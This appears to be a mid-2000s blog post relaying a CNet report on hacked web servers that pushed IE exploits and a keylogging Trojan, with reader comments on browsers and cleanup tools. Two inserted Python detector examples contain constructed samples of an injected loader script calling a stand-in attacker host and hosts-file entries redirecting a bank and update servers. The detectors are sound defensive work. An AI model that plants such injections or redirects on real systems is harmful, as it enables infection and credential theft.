Reason Number 15,586 To Own A Mac

From CNet News, a very nasty new twist for users of Windows:

Security researchers warned Web surfers on Thursday to be on guard after uncovering evidence that widespread Web server compromises have turned corporate home pages into points of digital infection.

The researchers believe that online organized crime groups are breaking into Web servers and surreptitiously inserting code that takes advantage of two flaws in Internet Explorer that Microsoft has not yet fixed. Those flaws allow the Web server to install a program that takes control of the user’s computer.

[T]he flaws affect every user of Internet Explorer, because Microsoft has not yet released a patch. Moreover, the infectious Web sites are not just those of minor companies inhabiting the backwaters of the Web, but major companies, including some banks, said Brent Houlahan, chief technology officer of NetSec.

“There’s a pretty wide variety,” he said. “There are auction sites, price comparison sites and financial institutions.”

The group also pointed out that the malicious program uploaded to a victim’s computer is not currently detected as a virus by most antivirus software. With no patch from Microsoft, that leaves Internet Explorer users vulnerable. A representative of the software giant was not immediately available for comment on when a patch might be available.

Researchers believe that attackers seed the Web sites with malicious code by breaking into unsecured servers or by using a previously unknown vulnerability in Microsoft’s Web software, Internet Information Server (IIS). When a victim browses the site, the code redirects them to one of two sites, most often to another server in Russia. That server uses the pair of Microsoft Internet Explorer vulnerabilities to upload and execute a remote access Trojan horse, RAT, to the victim’s PC. The software records the victim’s keystrokes and opens a back door in the system’s security to allow the attacker to access the computer.
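The attack chain quoted above starts on the compromised web server: code inserted into otherwise legitimate pages sends visitors to a second server. From the site operator's side, the useful check is whether served pages now reference hosts the site never loaded content from. The following is an added example, not code from the article or from the researchers it quotes; the allowlist, the page content and the `attacker-placeholder.test` host are constructed.

```python
"""Flag script/iframe/meta-refresh references that point outside an allowlist.

Added illustration for the server-side injection described in the article;
not the researchers' tooling. The allowlist and sample page are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this site legitimately loads content from.
ALLOWED_HOSTS = {"www.example-bank.test", "static.example-bank.test"}

# Constructed sample page: legitimate references plus injected ones that
# pull code from, or redirect the visitor to, an unrelated host.
SAMPLE_HTML = """<html><head>
<script src="https://static.example-bank.test/app.js"></script>
<meta http-equiv="refresh" content="0;url=http://attacker-placeholder.test/x">
</head><body>
<h1>Welcome</h1>
<iframe src="http://static.example-bank.test/rates.html"></iframe>
<script src="http://attacker-placeholder.test/loader.js"></script>
<script>var u = "http://attacker-placeholder.test/b.js"; location.href = u;</script>
</body></html>"""


class _RefCollector(HTMLParser):
    """Collect external references: script/iframe src, meta refresh targets,
    and absolute URLs written inside inline script bodies."""

    def __init__(self):
        super().__init__()
        self.refs = []          # list of (kind, url)
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "frame") and a.get("src"):
            self.refs.append((tag, a["src"]))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*([^;\s]+)", a.get("content", ""), re.I)
            if m:
                self.refs.append(("meta-refresh", m.group(1)))
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands script bodies to handle_data; look for URLs in them.
        if self._in_script:
            for url in re.findall(r"https?://[^\s'\"<>]+", data):
                self.refs.append(("inline-script", url))


def unexpected_references(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, url, host) for every reference whose host is not allowed.

    Relative URLs carry no host and stay on the site's own origin, so they
    are not reported.
    """
    parser = _RefCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for kind, url in parser.refs:
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:
            findings.append((kind, url, host))
    return findings


if __name__ == "__main__":
    for kind, url, host in unexpected_references(SAMPLE_HTML):
        print(f"{kind:14s} -> {host}  ({url})")
```

Run against a page snapshot taken from disk rather than the live site, since a compromised server may serve different content to different visitors; the three findings on the sample are the meta refresh, the injected external script and the URL inside the inline script, while the legitimate `static.example-bank.test` references pass.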

It wouldn’t surprise me a bit if this is one of the reasons why I had to completely reformat my wife’s Dell last night. After we got married and I hooked it into my broadband network, the piece of junk just exploded with adware and malware that had been sitting dormant, waiting for a fast connection. No combination of updates, blockers, cleaners, or virus software could save it; in less than 90 days, it was completely unusable.

I’m loading up Firefox for her tonight, and very strongly suggesting that she never launch IE again (even if she does have to think in Russian).


27 Responses to “Reason Number 15,586 To Own A Mac”

  1. Niall Says:

    While you're there go get Thunderbird as well (the smaller standalone mozilla based email client) and get rid of ALL of the potential microsoft problems.

    And there is a simple cure for the malware problem….go get Linux ;).

  2. triticale Says:

    I just installed Firefox last night, and am favorably impressed. Too early to be sure, but it seems to have solved the DNS trouble which was a residual of a search hijacker I’d defeated.

    As for e-mail, we’ve used Eudora for years, and we know that it has reduced virus problems along the way.

  3. chthus Says:

    Came back from Vegas to find the same type of problem (teach me not to shut down my comp). Ad-aware helped reduce the problem temporarily. Found a program (apj3kfzw.exe) that had attached to explorer. It had to be shut down and then removed, but seems to have eliminated the trouble (so far, cross fingers).

  4. Jeremy Brown Says:

    I have found, just in the past couple of months or so, that none of the major anti-virus applications are able to stop or detect some of the nastier trojans coming around — ones you can get simply from popup ads on websites or webmail.

    Here’s what finally saved the network at my office:


    This is not a spam comment — you can do a google search and find other anti-trojan packages as well. This one, however, has been highly rated and has no significant impact on system performance.

    Bottom line: use anti-virus AND anti-trojan AND a hardware firewall (router with NAT) AND a software firewall. It seems like overkill but it’s suddenly necessary.

    Reminds me of when I lived in NYC and had to install a lock plate over my trunk lock (and a steering wheel lock, etc.)

  5. michele Says:

    I’m having a horrendous time with my Dell laptop. Random pop up ads every three seconds, windows closing out of nowhere and new windows opening, all kinds of crazy stuff that Ad Aware doesn’t seem to help with.

    I blamed my kids. Maybe it wasn’t there fault, after all. Guess I’ll ditch IE on that computer.

  6. michele Says:

    Their fault.

    I hate when I do that.

  7. Frank Says:

    >widespread Web server compromises have turned corporate home pages into points of digital infection….[T]he flaws affect every user of Internet Explorer…

    Apache fans gotta be loving this. As a Mozilla user, I would hope I’m safe.

  8. The Lonewacko Blog Says:

    Researchers believe that attackers seed the Web sites with malicious code by breaking into unsecured servers or by using a previously unknown vulnerability in Microsoft’s Web software, Internet Information Server (IIS)

    This trojan has two parts: an IE part and a part that runs on the server. Personally, I would tend to avoid any web hosting company running Windows, and the fact that these servers were running Windows would appear to be the main culprit here.

  9. Crusader Says:

    I’ve used Opera for years now; it is a decent browser.

  10. rosignol Says:

    Y’all knew it was coming, so here it is:

    neener neener
    -Mac user


    (yes, the machine I’m posting from *now* is a w2k box. My machine at home isn’t)

  11. DrSteve Says:

    Agreed. Opera’s pretty nice.

    Remind your wife to squint really hard when she switches to guns. It seemed to help Clint.

  12. andy Says:

    It’s a javascript exploit and I see VodkaPundit uses javascript, wadda ya know!

  13. none Says:

    firefox is very nice in many ways, but does anyone know how to scroll a page using any keyboard key instead of the mouse?

  14. Cybrludite Says:

    Cleaning this krep up is what I mostly do all night at work. CWShredder, Hijack This, and then Ad-Aware is my current Holy Trinity. Just be careful with Hijack This. It looks for things that appear to be using known spyware exploits, and some of those are used by legit programs as well. (Like the Nachi Worm using the same port that Ping does.) In particular, it looks askance at host table entries & things that run at bootup.
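The comment above describes what cleanup tools look at (host table entries and things that run at bootup) and why they produce false positives. The following is an added example, not code from HijackThis, CWShredder or Ad-Aware: it parses a constructed hosts file and separates the common legitimate pattern (names blackholed to a loopback or unspecified address, as ad-blocking hosts lists do) from entries that send a name to some other machine. The `SENSITIVE_NAMES` set and all addresses and host names are placeholders.

```python
"""Triage hosts-file entries: blackholed names versus names redirected elsewhere.

Added example, not the logic of any tool named in the comment. The sample
hosts file, the addresses and the sensitive-name list are all constructed.
"""
import ipaddress
from collections import defaultdict

# Constructed: names an administrator would not expect to see in a hosts
# file at all (bank logins, vendor update and antivirus servers).
SENSITIVE_NAMES = {
    "www.example-bank.test",
    "update.example-vendor.test",
    "av.example-vendor.test",
}

SAMPLE_HOSTS = """# constructed hosts file
127.0.0.1       localhost
::1             localhost
# ad-blocking style entries: harmless, they blackhole the name
0.0.0.0         ads.example-tracker.test
127.0.0.1       banner.example-tracker.test
# suspicious: a bank and vendor update servers sent to another machine
203.0.113.7     www.example-bank.test
203.0.113.7     update.example-vendor.test   av.example-vendor.test
198.51.100.9    www.example-bank.test   # second mapping for the same name
203.0.113.7     search.example-portal.test
"""


def parse_hosts(text):
    """Return (lineno, ip_address, name) triples; comments and junk are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue   # not a hosts line we understand
        for name in parts[1:]:
            entries.append((lineno, addr, name.lower()))
    return entries


def classify(entries, sensitive=SENSITIVE_NAMES):
    """Return (lineno, name, address, reason) for entries worth a look.

    Blackholed names (loopback or 0.0.0.0) are the usual legitimate use and
    are not reported unless the name itself is on the sensitive list.
    """
    findings = []
    for lineno, addr, name in entries:
        if name == "localhost":
            continue
        blackholed = addr.is_loopback or addr.is_unspecified
        if name in sensitive:
            reason = ("sensitive name blackholed" if blackholed
                      else "sensitive name redirected off-host")
        elif blackholed:
            continue
        else:
            reason = "maps to non-local address"
        findings.append((lineno, name, str(addr), reason))
    return findings


def duplicate_names(entries):
    """Names that resolve to more than one address; later lines usually win."""
    seen = defaultdict(set)
    for _, addr, name in entries:
        seen[name].add(str(addr))
    return {n: sorted(a) for n, a in seen.items() if len(a) > 1 and n != "localhost"}


if __name__ == "__main__":
    entries = parse_hosts(SAMPLE_HOSTS)
    for lineno, name, addr, reason in classify(entries):
        print(f"line {lineno:2d}: {name:30s} {addr:15s} {reason}")
    for name, addrs in duplicate_names(entries).items():
        print(f"duplicate: {name} -> {', '.join(addrs)}")
```

On a real machine, feed it the contents of the system hosts file and adjust the sensitive list to the sites the users actually depend on; the point of the split is the one the comment makes, that a tool which flags every hosts entry will also flag the entries people added on purpose.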

  15. Ric Locke Says:

    Another recommendation for Opera (and Eudora for email)

    One nice thing about Eudora (and, I think, Firefox, though I’ve never used that) is the setting that disallows all popups except requested ones — that is, the ones you click. You still have to wait for the ferschlugginer code to load, but it doesn’t execute until you ask it to. That makes it possible for me to, e.g., use this comment box, but I never see an unsolicited popup.

    Ric Locke

  16. Ric Locke Says:

    Opera, not Eudora… Eudora is email. Opera is a Web browser. Ric doesn’t use Preview when he should…


  17. David Mercer Says:

    Opera, Firefox, Mozilla, Safari: doesn’t really matter, just anything but bare IE on Windows!

    Eudora, Thunderbird, Apple Mail: again, just so long as it’s anything but Outlook Express on Windows!

    IE on Windows can with care be put in a ‘virtual condom’, as it were, with things like MyIE2, which is a browser that uses the IE core, but with much, much better controls over security, tabbed browsing, and pop-up blocking. Safest way to use IE if you must (and damnit, some websites I still have to use require IE).

    Yes, now we see how wonderful MS integrating everything into the OS has been. All those application bugs in IE and Outlook Express are now in the OS.


  18. Burnside Says:

    Actually, this isn’t reason 15,586 to own a Mac, but more like reason 15,586 not to use Internet Exploder.

  19. felixrayman Says:

    Linux, Firefox 0.8 ( 0.9 is way too buggy still ), and the Adblocker extension.

    No popups, no ads, no spyware, no malware, flash when and only when I want it, and best of all, tabbed browsing, which to anyone who hasn’t used it is no big deal, and to anyone who has used it is indispensable.

  20. Matt Says:

    I’m a long-term Mac-user (since 1988), but I occasionally need to use VirtualPC (running W2K) for stuff like MS Project. At some point, a piece of Malware infected IE in there and later locked up the network connection. Sometimes, I think the real malware is Windows …

  21. Beavis Says:

    Windows is a virus because it:
    -Preys on unsavvy computer users
    -Balloons in size and can eat up whole hard drives
    -Decreases the performance of the computer over time
    -Creates backdoors for other viruses and worms to infect
    -Requires reformatting and reinstalling your computer
    -Can be solved by using Linux.

  22. ras Says:

    I too am just now trying out firefox and so far am impressed.

    My benchmark: is it seamless to use, so that I can just click & go? My answer: yes, at least so far.

    Best news: it even seems faster than IE. Given Netscape’s later history, this was a really really nice surprise.

  23. Alexander Says:

    The reason Windows gets hacked/attacked by viruses so often is that it’s everywhere. If Linux had 90% of the market, I bet people would be complaining how screwed Linux was and that Windows is much better.

    Sorry, bit of a pet peeve of mine. I do a bit of programming, so I see how difficult it is to anticipate every single possibility.

  24. andy Says:

    Security by obscurity…

  25. Stewart Vardaman Says:

    Per Alexander’s comment, there is one big difference between Unix and MSFT. MSFT uses a file name’s extension to determine whether a program can be executed or not. Under Unix eXecute permissions must be specifically applied before a program can run.

    There’s no question MSFT gets abused in a large part by their sheer market size, but there are also fundamental design issues as well.

  26. Spoons Says:

    I just got done using Firefox for about 2 weeks. I hated it. So many pages didn’t work the way I was used to — forget about all of the Movable Type tools, for example.

    I wish someone would explain to me why tabbed browsing is a good thing. I found it annoying. First, you have to use the awkward ctrl-tab to switch between tabs, rather than the familiar alt-tab that you can use if you simply have multiple instances of IE running. On top of that, lots of sites that have links set to open in new windows simply open new instances of Firefox, too. So after browsing for a while, you end up with several copies of firefox open, each with several different tabs. How is this an improvement over having 3 or 4 IEs running?

    Worst of all, once I decided I didn’t want Firefox anymore, I couldn’t get Windows to recognize IE as my default browser again. I’ve tried everything short of a complete reinstall of IE, which is what I’m probably going to have to do.

    If people love Firefox, more power to them, but I for the life of me can’t understand why.

  27. David Gillies Says:

    I’ll second (third, whatever) the Firefox recommendations. I use it on both my WinXP and Linux boxes and if and when I get a Mac I wouldn’t be too surprised if I end up using it there, too. It’s lean, very, very stable and has a consistent interface across platforms (something whose utility cannot be too highly stated). The excellent tabbed browsing is Opera-esque but I find stability to be streets ahead of Opera. It has much better support for anti-aliasing text under Linux as well.

    IE is simply too buggy to be allowed to do what it says: explore the internet. I am extremely strict about downloading and updating patches for my XP box, but I really wouldn’t be surprised if there’s a bunch of adware crawling around. Both my machines are on my broadband connection, but I mainly use the Linux box for surfing. The XP machine is for Photoshop/Illustrator and for playing Diablo II and Warcraft.
